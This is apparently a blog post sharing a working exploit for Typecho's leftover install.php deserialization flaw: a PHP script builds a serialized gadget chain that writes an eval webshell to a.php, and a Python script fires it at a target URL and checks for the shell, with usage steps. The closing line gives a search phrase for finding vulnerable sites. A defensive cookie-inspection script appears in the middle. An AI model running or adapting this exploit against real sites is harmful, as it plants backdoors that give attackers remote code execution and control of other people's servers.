Typecho exp: exploiting the leftover install.php backdoor

exp.php:

<?php

/**
* Created by PhpStorm.
* User: RaI4over
* Date: 2017/10/19
* Time: 15:17
* Generates the value for __typecho_config
*/
class Typecho_Feed
{
    const RSS2 = 'RSS 2.0';
    private $_type;
    private $_charset;
    private $_lang;
    private $_items = array();

    public function __construct($version, $type = self::RSS2, $charset = 'UTF-8', $lang = 'en')
    {
        $this->_version = $version;
        $this->_type = $type;
        $this->_charset = $charset;
        $this->_lang = $lang;
    }

    public function addItem(array $item)
    {
        $this->_items[] = $item;
    }
}

class Typecho_Request
{
    private $_params = array('screenName'=>'fputs(fopen(\'./a.php\',\'w\'),\'<?php @eval($_POST[minty]);?>\')');
    private $_filter = array('assert');
    //private $_filter = array('assert', array('Typecho_Response', 'redirect'));

}

$payload1 = new Typecho_Feed(5, 'ATOM 1.0');
$payload2 = new Typecho_Request();
$payload1->addItem(array('author' => $payload2));
$exp['adapter'] = $payload1;
$exp['prefix'] = 'MxxY';
echo base64_encode(serialize($exp));

exp.py:

import requests
import os

if __name__ == '__main__':
    print ''' ____          ____      _ _  _
| __ ) _  _  |  _ \ __ _(_) || |  _____  _____ _ __
|  _ \| | | |  | |_) / _` | | || |_ / _ \ \ / / _ \ '__|
| |_) | |_| |  |  _ < (_| | |__  _| (_) \ V /  __/ |
|____/ \__, |  |_| \_\__,_|_|  |_|  \___/ \_/ \___|_|
      |___/
    '''

    targert_url = 'https://xxxxx';

    rsp = requests.get(targert_url + "/install.php");
    if rsp.status_code != 200:
        exit('The attack failed and the problem file does not exist !!!')
    else:
        print 'You are lucky, the problem file exists, immediately attack !!!'

    proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080", }

    typecho_config = os.popen('php exp.php').read()

    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0',
              'Cookie': 'antispame=1508415662; antispamkey=cc7dffeba8d48da508df125b5a50edbd; PHPSESSID=po1hggbeslfoglbvurjjt2lcg0; __typecho_lang=zh_CN;__typecho_config={typecho_config};'.format(typecho_config=typecho_config),
              'Referer': targert_url}

    url = targert_url + "/install.php?finish=1"

    requests.get(url,headers=headers,allow_redirects=False)

    shell_url = targert_url + '/a.php'
    if requests.get(shell_url).status_code == 200:
        print 'shell_url: ' + shell_url
    else:
        print "Getshell Fail!"

  • Put exp.php and exp.py in the same directory, and change target_url in exp.py to the target URL
  • The one-line webshell contents and its path can be changed in exp.php; after changing them, also change the path in exp.py

One more thing

When I was trying to modify the exp, I wanted to obtain the payload without using PHP, so I decoded the base64 output of running php exp.php back into plaintext; but when I base64-encoded it again, I found that the encoded base64 value differed from the earlier one, and I don't know why.
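From the defending side, here is an added example of my own (not part of this post and not Typecho code) that inspects a __typecho_config cookie value the way a WAF rule or a log-review script would: it base64-decodes the value and flags the shapes the exp above produces, namely a serialized object where 'adapter' should be a driver name, embedded Typecho_Feed/Typecho_Request objects, and a _filter list of callables. Both sample cookies are constructed inline rather than captured from a real host.

```python
import base64
import binascii
import re

# In a legitimate install cookie 'adapter' is a driver name such as "Pdo_Mysql";
# a serialized object in that slot is the tell-tale of the gadget chain above.
ADAPTER_IS_OBJECT = re.compile(rb's:7:"adapter";O:\d+:"')
EMBEDDED_OBJECT = re.compile(rb'O:\d+:"(Typecho_Feed|Typecho_Request)"')
FILTER_ARRAY = re.compile(rb'_filter";a:\d+:\{(.*?)\}', re.S)
PHP_STRING = re.compile(rb's:\d+:"([^"]*)"')

def inspect_config_cookie(value):
    """Findings for one __typecho_config value; an empty list means nothing suspicious."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return ["cookie is not valid base64"]
    findings = []
    if ADAPTER_IS_OBJECT.search(raw):
        findings.append("'adapter' holds a serialized object, not a driver name")
    for cls in sorted(set(EMBEDDED_OBJECT.findall(raw))):
        findings.append("embedded object of class " + cls.decode())
    m = FILTER_ARRAY.search(raw)
    if m:
        names = [n.decode() for n in PHP_STRING.findall(m.group(1))]
        findings.append("_filter carries callables: " + ", ".join(names))
    return findings

def php_str(value):
    """PHP serialization of one string (the length counts bytes)."""
    b = value.encode()
    return b's:%d:"%s";' % (len(b), b)

def php_private(cls, name):
    """Serialized name of a private property: NUL, class, NUL, property."""
    return php_str("\x00" + cls + "\x00" + name)

# Constructed samples (hypothetical; not captured from a real host).
BENIGN_CONFIG = base64.b64encode(
    b'a:2:{' + php_str("adapter") + php_str("Pdo_Mysql")
    + php_str("prefix") + php_str("typecho_") + b'}').decode()
HOSTILE_CONFIG = base64.b64encode(
    b'a:2:{' + php_str("adapter") + b'O:12:"Typecho_Feed":1:{'
    + php_private("Typecho_Feed", "_items") + b'a:1:{i:0;a:1:{' + php_str("author")
    + b'O:15:"Typecho_Request":2:{' + php_private("Typecho_Request", "_params")
    + b'a:1:{' + php_str("screenName") + php_str("sample") + b'}'
    + php_private("Typecho_Request", "_filter") + b'a:1:{i:0;' + php_str("assert")
    + b'}}}}}' + php_str("prefix") + php_str("MxxY") + b'}').decode()
```

The NUL bytes in the private property names are also why re-encoding a copy-pasted decoded payload gives a different base64 string: terminals and editors silently drop them.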

What is the search keyword for finding sites like this??

powered by typecho
